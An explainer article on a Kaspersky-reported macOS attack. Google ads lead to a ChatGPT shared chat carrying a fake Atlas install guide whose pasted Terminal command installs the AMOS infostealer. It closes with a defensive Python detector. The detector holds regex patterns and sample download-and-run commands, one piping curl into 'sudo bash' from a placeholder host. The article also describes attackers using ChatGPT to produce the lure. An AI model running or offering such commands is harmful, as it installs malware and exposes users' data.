A recent analysis by cybersecurity experts at Kaspersky has brought to light an insidious attack aimed at macOS users, one in which search engines, artificial intelligence and cybersecurity intertwine to create fertile ground for a dangerous new online fraud. Attackers exploit ChatGPT’s chat sharing feature to create an installation guide for ChatGPT Atlas (OpenAI’s browser). The result is a trap capable of deceiving even the most astute: every detail, from the website to the guide, appears harmless and perfectly legitimate. In this in-depth analysis we reconstruct the key steps of the attack: how criminals manipulate Google Ads with misleading links, how they use ChatGPT as a “window display” to promote the false guide, and the social engineering techniques involved. We then describe the danger of the malware in question, the AMOS infostealer, which can steal a wide range of data from victims (from history to crypto wallets), and explain how to defend yourself in practice.
How the Mac attack that exploits ChatGPT shared chats works
It all starts with sponsored ads on Google. The experts at Kaspersky explain that, when searching for terms like “chatgpt atlas” on Google, the first result appears completely legitimate: a coherent title, a domain shown as the official ChatGPT one, and no apparent signs of counterfeiting. Since the full address is not visible in the preview, criminals are able to hide the real destination reached by opening that URL. In fact, clicking on the link opens a page that really is hosted on the official ChatGPT domain, but it is only a conversation shared via the sharing function.
And here we find a first aspect that underlies the mechanism of this attack: the link comes from the domain of the OpenAI chatbot, which gives the guide an aura of authenticity that induces many users to lower their defenses and their attention threshold. The content shown on the page opened in ChatGPT is a fake Atlas installation guide. Here the attackers used prompt engineering, shaping their requests to the AI to obtain a technical text formatted in an orderly and credible way. They then cleaned up the previous chat to hide any trace of the manipulation. A truly attentive eye, however, could still notice that something doesn’t add up. Kaspersky, in fact, explains:
Links to shared chats begin with chatgpt.com/share/. In fact, right above the chat it is clearly indicated: “This is a copy of a conversation between ChatGPT and an anonymous user”.
However, a less attentive or simply less AI-savvy visitor might take the guide at face value, especially since it is well formatted and published on a reliable-looking site.
The critical point arrives when the user follows the supposed instructions for installing the OpenAI browser. Users are prompted to copy and paste a command into the macOS Terminal. This is the key step: once entered in the Terminal, the command immediately downloads and starts a script from an external server. This is a variant of the ClickFix method, in which the victim is convinced to perform a malicious operation manually. Many users, while avoiding unknown files, do not associate the same risk with a command that they paste into the Terminal. Once launched, the script repeatedly asks for the system password until the correct one is entered; at that point, the malware installs itself using the privileges obtained.
At this point, a user who has carefully followed the steps of the “malicious tutorial” will have installed a variant of AMOS (Atomic macOS Stealer), a dangerous infostealer created to steal a large amount of sensitive data. It extracts passwords and cookies from major browsers, data from apps like OpenVPN and Telegram, and empties crypto wallets (like Electrum, Coinomi and Exodus). But it doesn’t stop there: it also collects the user’s personal files from the Mac’s main folders (including Desktop, Documents and Downloads), packages everything up and sends the information to servers run by criminals. In addition to data theft, it installs a backdoor that grants continuous remote access to the device, reactivating itself every time the Mac is restarted.
How to defend yourself from the AMOS infostealer
Given the danger of this attack, you will now certainly want to know which defense strategies to adopt to reduce the risk of infection. Here are some points to keep in mind:
- The first step is to use an updated anti-malware solution for macOS, a system that is far from immune to cyber attacks.
- If you want to install ChatGPT Atlas, follow the instructions in our guide and be wary of any instructions that require you to manually open the Terminal to execute commands taken from the Web or from a chat, even if the tone appears technical and reassuring: it is a typical sign of social engineering.
- When faced with unsolicited or unclear instructions, the wisest choice is to close the page. Alternatively, you can paste the suspicious command into an AI chat to ask for analysis: a simple check can avoid major damage.
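The check suggested in the last point can be partly automated. The Python sketch below is an added example, not code from Kaspersky or from this article: it recognizes the `chatgpt.com/share/` link marker quoted above and flags the download-and-run shape of a pasted Terminal command, going slightly beyond the article by also looking inside base64-encoded blobs. The rules, function names, host and chat id are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import urlparse

SHELL = r"(?:sudo\s+)?(?:ba|z|da)?sh\b"
FETCH = r"\b(?:curl|wget)\b"
# Heuristic rules written for this example; they are not a complete detector.
RULES = {
    "download piped into a shell":
        re.compile(rf"{FETCH}[^|;&]*\|\s*{SHELL}"),
    "shell run on the output of a download":
        re.compile(rf"\b(?:(?:ba|z|da)?sh|eval|source)\b[^|;&]*(?:<\(|\$\(|`)\s*{FETCH}"),
    "base64 blob decoded into a shell":
        re.compile(rf"\bbase64\s+(?:-d|-D|--decode)\b[^|;&]*\|\s*{SHELL}"),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def is_shared_chat(url: str) -> bool:
    """True if the link is a user-shared conversation on the ChatGPT domain."""
    u = urlparse(url)
    return u.hostname == "chatgpt.com" and u.path.startswith("/share/")


def inspect_command(cmd: str) -> list[str]:
    """Return the reasons a pasted Terminal command looks like download-and-run."""
    findings = [name for name, rx in RULES.items() if rx.search(cmd)]
    # Look inside base64 blobs too: the fetch may only be visible once decoded.
    for blob in B64_BLOB.findall(cmd):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except ValueError:
            continue
        findings += [f"hidden in base64: {f}" for f in inspect_command(decoded)]
    return findings


# Constructed samples (placeholder host and chat id, not taken from the attack).
SAMPLES = [
    '/bin/bash -c "$(curl -fsSL https://downloads.example.invalid/atlas.sh)"',
    "curl -fsSL https://downloads.example.invalid/atlas.sh | sudo bash",
    "brew install --cask firefox",
]

if __name__ == "__main__":
    print(is_shared_chat("https://chatgpt.com/share/EXAMPLE-ID"))
    for sample in SAMPLES:
        print(sample, "->", inspect_command(sample) or "no download-and-run pattern")
```

An empty result only means none of these few patterns matched; it does not make a command safe to run.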









